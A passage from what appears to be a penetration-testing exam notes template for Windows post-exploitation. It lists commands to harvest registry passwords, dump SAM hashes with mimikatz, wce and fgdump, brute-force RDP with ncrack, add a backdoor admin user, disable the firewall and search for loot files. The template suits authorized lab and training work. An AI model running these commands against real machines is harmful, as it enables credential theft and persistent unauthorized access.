434 |
435 |
436 | ### To-try list
437 | Here you will add all possible leads. What to try.
438 |
439 |
440 | ### Basic info
441 |
442 | - OS:
443 | - Version:
444 | - Architecture:
445 | - Current user:
446 | - Hotfixes:
447 | - Antivirus:
448 |
449 | **Users:**
450 |
451 | **Localgroups:**
452 |
453 | ```
454 | systeminfo
455 | set
456 | hostname
457 | net users
458 | net user user1
459 | net localgroups
460 | accesschk.exe -uwcqv "Authenticated Users" *
461 |
462 | netsh firewall show state
463 | netsh firewall show config
464 |
465 | # Set path
466 | set PATH=%PATH%;C:\xampp\php
467 | ```
468 |
469 |
470 | ### Kernel exploits
471 |
472 |
473 | ```
474 | # Look for hotfixes
475 | systeminfo
476 |
477 | wmic qfe get Caption,Description,HotFixID,InstalledOn
478 |
479 | # Search for exploits
480 | site:exploit-db.com windows XX XX
481 | ```
482 |
483 |
484 | ### Cleartext passwords
485 |
486 | ```
487 | # Windows autologin
488 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
489 |
490 | # VNC
491 | reg query "HKCU\Software\ORL\WinVNC3\Password"
492 |
493 | # SNMP Parameters
494 | reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
495 |
496 | # Putty
497 | reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
498 |
499 | # Search for password in registry
500 | reg query HKLM /f password /t REG_SZ /s
501 | reg query HKCU /f password /t REG_SZ /s
502 | ```
503 |
504 |
505 | ### Reconfigure service parameters
506 |
507 | - Unquoted service paths
508 |
509 | Check book for instructions
510 |
511 | - Weak service permissions
512 |
513 | Check book for instructions
514 |
515 | ### Inside service
516 |
517 | Check netstat to see what ports are open from outside and from inside. Look for ports only available on the inside.
518 |
519 | ```
520 | # Meterpreter
521 | run get_local_subnets
522 |
523 | netstat /a
524 | netstat -ano
525 | ```
526 |
527 | ### Programs running as root/system
528 |
529 |
530 |
531 | ### Installed software
532 |
533 | ```
534 | # Metasploit
535 | ps
536 |
537 | tasklist /SVC
538 | net start
539 | reg query HKEY_LOCAL_MACHINE\SOFTWARE
540 | DRIVERQUERY
541 |
542 | Look in:
543 | C:\Program files
544 | C:\Program files (x86)
545 | Home directory of the user
546 | ```
547 |
548 |
549 | ### Scheduled tasks
550 |
551 | ```
552 | schtasks /query /fo LIST /v
553 |
554 | Check this file:
555 | c:\WINDOWS\SchedLgU.Txt
556 | ```
557 |
558 | ### Weak passwords
559 |
560 | Remote desktop
561 |
562 | ```
563 | ncrack -vv --user george -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS
564 | ```
565 |
566 | ### Useful commands
567 |
568 |
569 | **Add user and enable RDP**
570 |
571 | ```
572 | net user haxxor Haxxor123 /add
573 | net localgroup Administrators haxxor /add
574 | net localgroup "Remote Desktop Users" haxxor /ADD
575 |
576 | # Enable RDP
577 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
578 |
579 | Turn firewall off
580 | netsh firewall set opmode disable
581 |
582 | Or like this
583 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
584 |
585 | If you get this error:
586 |
587 | "ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?
588 | Failed to connect, CredSSP required by server.""
589 |
590 | Add this reg key:
591 |
592 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
593 | ```
594 |
595 |
596 |
597 | ------------------------------------------------------------------------
598 |
599 |
600 |
601 |
602 | ----------------------------- LOOT LOOT LOOT LOOT -------------------
603 |
604 |
605 |
606 |
607 | ------------------------------------------------------------------------
608 |
609 |
610 | ## Loot
611 |
612 | - Proof:
613 | - Network secret:
614 | - Password and hashes:
615 | - Dualhomed:
616 | - Tcpdump:
617 | - Interesting files:
618 | - Databases:
619 | - SSH-keys:
620 | - Browser:
621 |
622 | ### Proof
623 |
624 | ### Network secret
625 |
626 | ### Passwords and hashes
627 |
628 | ```
629 | wce32.exe -w
630 | wce64.exe -w
631 | fgdump.exe
632 |
633 | reg.exe save hklm\sam c:\sam_backup
634 | reg.exe save hklm\security c:\security_backup
635 | reg.exe save hklm\system c:\system
636 |
637 | # Meterpreter
638 | hashdump
639 | load mimikatz
640 | msv
641 | ```
642 |
643 | ### Dualhomed
644 |
645 | ```
646 | ipconfig /all
647 | route print
648 |
649 | # What other machines have been connected
650 | arp -a
651 | ```
652 |
653 | ### Tcpdump
654 |
655 | ```
656 | # Meterpreter
657 | run packetrecorder -li
658 | run packetrecorder -i 1
659 | ```
660 |
661 | ### Interesting files
662 |
663 | ```
664 | #Meterpreter
665 | search -f *.txt
666 | search -f *.zip
667 | search -f *.doc
668 | search -f *.xls
669 | search -f config*
670 | search -f *.rar
671 | search -f *.docx
672 | search -f *.sql
673 |
674 | # How to cat files in meterpreter
675 | cat c:\\Inetpub\\iissamples\\sdk\\asp\\components\\adrot.txt
676 |
677 | # Recursive search
678 | dir /s
679 | ```
680 |
681 | ### Mail
682 |
683 | ### Browser
684 |
685 | - Browser start-page:
686 | - Browser-history:
687 | - Saved passwords:
688 |
689 | ### Databases
690 |
691 | ### SSH-keys
692 |
693 | ## How to replicate:
694 |
--------------------------------------------------------------------------------